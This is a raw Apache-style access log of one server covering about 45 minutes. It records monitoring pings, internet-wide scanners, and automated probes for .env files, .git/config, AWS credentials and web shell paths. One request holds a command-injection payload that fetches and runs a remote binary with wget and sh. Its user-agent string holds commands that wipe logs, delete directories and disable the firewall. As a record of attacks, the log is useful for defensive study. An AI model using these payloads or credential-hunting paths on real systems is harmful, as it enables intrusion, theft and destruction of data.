212.91.246.72 - - [04/Jan/2024:21:31:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "GET /.git/config HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "GET /api/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:32:20 +0100] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:32:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:33:55 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.210.31.195 - - [04/Jan/2024:21:34:47 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Jan/2024:21:34:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:35:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
78.153.140.221 - - [04/Jan/2024:21:35:58 +0100] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
78.153.140.221 - - [04/Jan/2024:21:35:58 +0100] "\x16\x03\x01\x01H\x01" 501 321 "-" "-"
206.72.206.92 - - [04/Jan/2024:21:36:54 +0100] "HEAD /p0wny.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
206.72.206.92 - - [04/Jan/2024:21:36:54 +0100] "HEAD /shell.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
206.72.206.92 - - [04/Jan/2024:21:36:54 +0100] "HEAD /p.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
206.72.206.92 - - [04/Jan/2024:21:36:55 +0100] "HEAD /powny.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:36:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:37:37 +0100] "GET /core/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:37:37 +0100] "GET /inc/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:37:37 +0100] "GET /laravel/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:37:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:38:56 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:39:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:40:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:41:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:42:21 +0100] "GET /env/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:42:21 +0100] "GET /sendgrid.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:42:21 +0100] "GET /data/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:42:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:43:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:44:57 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.173.133.244 - - [04/Jan/2024:21:45:29 +0100] "GET /app/.git/config HTTP/1.1" 404 320 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 635) like Gecko"
212.91.246.72 - - [04/Jan/2024:21:45:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:46:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:47:07 +0100] "GET /private/.env HTTP/1.1" 404 317 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:47:07 +0100] "GET /database/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:47:07 +0100] "GET /docker/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:47:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:48:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:49:58 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.175.182.99 - - [04/Jan/2024:21:50:14 +0100] "GET /js/.git/config HTTP/1.1" 404 319 "-" "Mozilla/5.0 (Linux; Android 9; Pixel 3a) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.89 Mobile Safari/537.36"
3.85.24.248 - - [04/Jan/2024:21:50:35 +0100] "GET /dist/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.35 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:50:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:51:46 +0100] "GET /app/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:51:46 +0100] "GET /mailer/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:51:46 +0100] "GET /secure/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
54.173.133.244 - - [04/Jan/2024:21:51:57 +0100] "GET /test/.git/config HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Safari/605.1.15 Epiphany/605.1.15"
212.91.246.72 - - [04/Jan/2024:21:51:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:52:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:53:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
54.175.182.99 - - [04/Jan/2024:21:54:43 +0100] "GET /src/test/.git/config HTTP/1.1" 404 325 "-" "Wget/1.9 cvs-stable (Red Hat modified)"
212.91.246.72 - - [04/Jan/2024:21:54:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:55:59 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:21:56:39 +0100] "GET /deploy/.env HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:56:39 +0100] "GET /.env.dist HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:21:56:39 +0100] "GET /config/app/.env HTTP/1.1" 404 320 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:21:57:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
167.94.146.59 - - [04/Jan/2024:21:57:12 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
167.94.146.59 - - [04/Jan/2024:21:57:15 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
167.94.146.59 - - [04/Jan/2024:21:57:15 +0100] "PRI * HTTP/2.0" 400 329 "-" "-"
167.94.146.59 - - [04/Jan/2024:21:57:15 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [04/Jan/2024:21:58:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jan/2024:21:59:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:21:59:40 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:00:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:00:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:00:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:01:00 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:01:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:01:10 +0100] "\x16\x03\x01" 501 318 "-" "-"
51.75.35.29 - - [04/Jan/2024:22:01:33 +0100] "GET /.aws/credentials HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:01:33 +0100] "GET /.env.dev HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:01:33 +0100] "GET /.env.docker HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:02:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:22:02:17 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:02:21 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:02:34 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:02:45 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:02:48 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:03:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:03:33 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:03:40 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:03:46 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:03:48 +0100] "GET /favicon.ico HTTP/1.1" 404 316 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:22:04:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:04:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:04:36 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:04:47 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:04:51 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:05:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:05:36 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:05:42 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:05:47 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:05:50 +0100] "GET /manage/account/login HTTP/1.1" 404 325 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
103.116.52.127 - - [04/Jan/2024:22:05:55 +0100] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.203.234/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 329 "-" "Hakai/2.0;rm -rf /tmp/* /var/* /var/run/* /var/tmp/*;rm -rf /var/log/wtmp;rm -rf ~/.bash_history;history -c;history -w;rm -rf /tmp/*;history -c;rm -rf /bin/netstat;history -w;pkill -9 busybox;pkill -9 perl;service iptables stop;/sbin/iptables -F;/sbin/iptables -X;service firewalld stop;"
212.91.246.72 - - [04/Jan/2024:22:06:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
51.75.35.29 - - [04/Jan/2024:22:06:31 +0100] "GET /.env.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:06:31 +0100] "GET /.env.backup HTTP/1.1" 404 316 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:06:31 +0100] "GET /.env.prod HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:07:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
80.79.117.42 - - [04/Jan/2024:22:07:08 +0100] "GET / HTTP/1.0" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:07:23 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:07:35 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:07:46 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:07:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:08:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:08:35 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:08:41 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:08:46 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:08:48 +0100] "GET /admin/index.html HTTP/1.1" 404 321 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
205.210.31.144 - - [04/Jan/2024:22:08:59 +0100] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [04/Jan/2024:22:09:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:09:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
157.245.241.253 - - [04/Jan/2024:22:09:54 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:10:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:10:03 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:10:14 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:10:17 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:11:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:11:03 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:11:09 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:11:14 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:11:16 +0100] "GET /index.html HTTP/1.1" 200 1229 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
51.75.35.29 - - [04/Jan/2024:22:11:34 +0100] "GET /conf/.env HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:11:34 +0100] "GET /.env.save HTTP/1.1" 404 314 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:11:34 +0100] "GET /sys/.env HTTP/1.1" 404 313 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:12:02 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:12:37 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:12:50 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:13:01 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:13:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:13:04 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:13:49 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:13:56 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:14:01 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:22:14:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:14:03 +0100] "GET /+CSCOE+/logon.html HTTP/1.1" 404 323 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.85.24.248 - - [04/Jan/2024:22:14:07 +0100] "GET /vendor/.git/config HTTP/1.1" 404 323 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
212.91.246.72 - - [04/Jan/2024:22:15:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:15:05 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:15:18 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:15:29 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:15:33 +0100] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [04/Jan/2024:22:16:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:16:18 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:16:24 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
3.8.140.82 - - [04/Jan/2024:22:16:29 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
51.75.35.29 - - [04/Jan/2024:22:16:29 +0100] "GET /credentials/.env HTTP/1.1" 404 321 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:16:29 +0100] "GET /includes/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
51.75.35.29 - - [04/Jan/2024:22:16:29 +0100] "GET /settings/.env HTTP/1.1" 404 318 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36"
3.8.140.82 - - [04/Jan/2024:22:16:31 +0100] "GET /cgi-bin/login.cgi HTTP/1.1" 404 322 "-" "'Cloud mapping experiment. Contact research@pdrlabs.net'"
212.91.246.72 - - [04/Jan/2024:22:17:03 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
3.8.140.82 - - [04/Jan/2024:22:17:27 +0100] "\x16\x03\x01" 501 318 "-" "-"
3.8.140.82 - - [04/Jan/2024:22:17:40 +0100] "\x16\x03\x01" 501 318 "-" "-"
